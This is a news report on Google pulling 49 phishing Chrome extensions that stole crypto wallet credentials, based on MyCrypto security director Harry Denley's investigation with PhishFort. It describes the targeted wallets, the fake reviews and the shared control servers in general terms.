Google recently removed 49 phishing extensions of Google Chrome web browser after it received reports of its activity as targeting users’ data of crypto.
Harry Denley, director of security at cryptocurrency wallet startup MyCrypto, explained in an April 14 Medium post how he got the extensions removed from Chrome store within 24 hours with the help of phishing-specialized cybersecurity firm PhishFort.
The removed extensions include those that targeted the owners of Ledger, Trezor and KeepKey produced hardware wallets, and users of Jaxx, MyEtherWallet, Metamask, Exodus and Electrum software wallets.
The extensions triggered users to enter the credentials needed for accessing the wallet—such as mnemonic phrases, private keys, and keystore files—and sent them to bad actors. The crypto-assets contained in the wallets were then stealed by hackers.
Some of the extensions in the Chrome extension store also had fake five-star ratings, but the reviews contained little to no information ranging from “good,” “helpful app” to “legit extension.”
One of the extensions reportedly had different users copying and pasting the same review eight times. The copypasta included an introduction to Bitcoin (BTC) and explained why the preferred wallet option was MyEtherWallet-the targeted wallet of the extension. It is worth noting that MyEtherWallet does not support Bitcoin as such.
The investigation uncovered 14 control servers behind all the extensions, but the analysis of fingerprinting revealed that some of the servers were run by the same bad actors, with the oldest domain being linked to many other control servers. Denley later concluded that most of the extensions had the same bad actors behind them.
Some of the domains used in the phishing campaigns were relatively old, but in March and April 2020 80 percent of them were registered. Most of the extensions were released this month on Chrome’s store.
Not the First Phishing Attempt
This is not the first time the community has come across a malicious Google Chrome browser extension targeting users of crypto. A Redditor warned the community that after falling victim to a fake Ledger extension, he lost some crypto-assets.
Google Chrome extensions targeting crypto users are so common, that earlier this month MyEtherWallet warned its user that its official extension was removed for supposedly malware-containing. Fortunately, soon after the team contacted Google to resolve the issue, the extension was restored.